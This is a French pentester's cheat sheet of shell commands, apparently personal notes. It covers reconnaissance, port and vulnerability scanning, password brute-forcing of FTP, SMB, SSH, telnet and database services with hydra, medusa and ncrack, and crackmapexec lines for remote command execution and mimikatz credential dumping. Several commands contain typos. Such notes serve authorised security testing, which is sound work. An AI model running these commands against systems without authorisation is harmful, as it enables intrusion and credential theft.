########################## PHASE DE RECONNAISSANCE #######################################################
############# PASSIVE ####################################################################################

# nslookup 
nslookup URL
# nslookup A
nslookup -type=A URL
# nslookup MX
nslookup -type=MX URL
# nslookup TXT
nslookup -type=TXT URL

# Dig
dig URL
# Dig MX
dig URL MX
# Dig A
dig URL A
# Dig TXT
dig URL TXT

# Host command
host URL 
# Host command ALL
host -a URL

# Whois
whois URL
whois IP_ADDRESS 

# wafw00f 
wafw00f URL

# whatweb
whatweb URL 

# dnsrecon
dnsrecon -d URL
# dnsrecon ALL
dnsrecon -d URL -a


########################## PHASE DE RECONNAISSANCE #######################################################
############# ACTIVE #####################################################################################

# Ping IP
ping -c 5 IP_ADDRESS
# Ping URL
ping -c 5 URL

# Fping
fping -g IP_ADDRESS/24

# TracerouteURL
traceroute URL
 
# TracerouteIP
traceroute IP_ADDRESS

############# ACTIVE ####################################################################################
########################## TESTS SSL ####################################################################

# testssl
testssl URL

# sslscan
sslscan URL

# sslyze
sslyze URL

############# ACTIVE ####################################################################################
########################## SCAN DE PORTS ################################################################

# Nmap classique
nmap IP_ADDRESS -p-

# Nmap scan OS, services
nmap -Pn -sV -A IP_ADDRESS

# Nmap scan script
nmap -Pn -sC IP_ADDRESS

########################## OSINT ########################################################################
#########################################################################################################

# Spiderfoot
spiderfoot -s URL

########################## RECHERCHE DE VULNERABILITES ####################################################
########################## SCAN DE VULN ###################################################################

# Nmap vulnerability
nmap -Pn -sV --script vuln IP_ADDRESS

# nikto
nikto -h IP_ADDRESS

########################## RECHERCHE DE VULNERABILITES ####################################################
########################## WEB ############################################################################

# HTTRACK
httrack https://URL

#
# Curl
curl -v -X http URL

# Nmap detect waf 
nmap --script=http-waf-fingerprint URL

# Wapiti
wapiti -u https://URL -m sql,xss,xxe

# theHarvester
theHarvester -d URL -l 10 -b all

# gobuster 
gobuster dir -u https://URL -w /usr/share/wordlists/dirb/big.txt -b 404 -q

# Sublist3r
sublist3r --domain URL

# Dirb
dirb https://URL /usr/share/wordlists/dirb/common.txt -S -r

# Wpscan
wpscan --url URL --random-user-agent

#
########################## RECHERCHE DE VULNERABILITES ####################################################
########################## TESTS SNMP #####################################################################

# Snmpcheck
snmp-check IP_ADDRESS

########################## RECHERCHE DE VULNERABILITES ####################################################
########################## TESTS SMB ######################################################################

# Nmap smb Discover
nmap -p445 --script smb-protocols IP_ADDRESS

# enum4linux smb Discover
enum4linux -U -o IP_ADDRESS

# nbtscan 
nbtscan IP_ADDRESS/24

# SMBmap 
smbmap -H IP_ADDRESS

########################## RECHERCHE DE VULNERABILITES ####################################################
########################## TESTS DATABASE #################################################################

# Sqlmap 
sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3

########################## PASSWORD ATTACK ################################################################
########################## TESTS PASSWORD #################################################################
########################## FTP SERVER #####################################################################
# hydra FTP x liste d'user
hydra -t 1 -V -f -l Anonymous -P /usr/share/wordlists/dirb/small.txt IP_ADDRESS ftp

# Medusa FTP
medusa -h IP_ADDRESS -u Anonymous -P /usr/share/wordlists/dirb/small.txt -M ftp

# ncrack FTP
ncrack -p 21 --user Anonymous -P /usr/share/wordlists/dirb/small.txt IP_ADDRESS

########################## SMB SERVER #####################################################################
# hydra SMB x liste d'user
hydra -t 1 -V -f -l admin -P /usr/share/wordlists/dirb/small.txt IP_ADDRESS smb

# Medusa SMB
medusa -h IP_ADDRESS -u admin -P /usr/share/wordlists/dirb/small.txt -M smbnt


########################## SMTP SERVER ####################################################################
# hydra SMTP x liste d'user
hydra -t 1 -V -f -l admin -P /usr/share/wordlists/dirb/small.txt IP_ADDRESS smsmtp

# Medusa SMTP
medusa -h IP_ADDRESS -u admin -P /usr/share/wordlists/dirb/small.txt -M snmtp


########################## MYSQL SERVER ####################################################################
# hydra MYSQL (voir si c'est l'url ou l'ip dans les paramètres)
hydra -t 1 -V -f -L /usr/share/wordlists/others/names.txt -P /usr/share/wordlists/dirb/small.txt URL mysql

# Medusa MYSQL
medusa -h IP_ADDRESS -u admin -P /usr/share/wordlists/dirb/small.txt -M mssql

########################## SNMP SERVER #####################################################################
# hydra SNMP
# hydra -P /usr/share/wordlists/dirb/small.txt -v IP_ADDRESS snmp

# Medusa SNMP
medusa -h IP_ADDRESS -u admin -P /usr/share/wordlists/dirb/small.txt -M snmp


########################## SSH #############################################################################
# hydra SSH
hydra -v -V -u -L /usr/share/wordlists/others/names.txt -P /usr/share/wordlists/dirb/small.txt -t 1 -u IP_ADDRESS ssh

# Medusa SSH
medusa -h IP_ADDRESS -u admin -P /usr/share/wordlists/dirb/small.txt -M ssh

# ncrack SSH
ncrack -p 22 --user root -P passwords.txt IP_ADDRESS [-T 5]

########################## LDAP ###########################################################################
# Nmap LDAP BF
nmap --script ldap-brute -p 389 IP_ADDRESS

########################## TELNET #########################################################################
# hydra TELNET
hydra -l root -P /usr/share/wordlists/dirb/small.txt -t 32 IP_ADDRESS telnet

# ncrack TELNET
ncrack -p 23 --user root -P /usr/share/wordlists/dirb/small.txt IP_ADDRESS -T 5

# Medusa TELNET
medusa -u root -P /usr/share/wordlists/dirb/small.txt -h IP_ADDRESS -M telnet

########################## EXPLOITATION ###################################################################
###########################################################################################################

# PwnXSS à installer
python3 PwnXSS/pwnxss.py -u https://URL

#crackmapexec
crackmapexec IP_ADDRESS -u utilisateur -p motdepasse --shares
#crackmapexec whoami
crackmapexec IP_ADDRESS -u utilisateur -p motdepasse --exec-command 'whoami'
#crackmapexec password
crackmapexec IP_ADDRESS/24 -u ‘admin’ -p ‘P@ssw0rd’
#crackmapexec mmk
crackmapexec IP_ADDRESS -u utilisateur -p motdepasse --mimikatz

########################## POST EXPLOITATION ##############################################################
###########################################################################################################

#Beroot à installer
python3 Beroot/Linux/beroot.py
#Beroot
python3 Beroot/Windows/beroot.py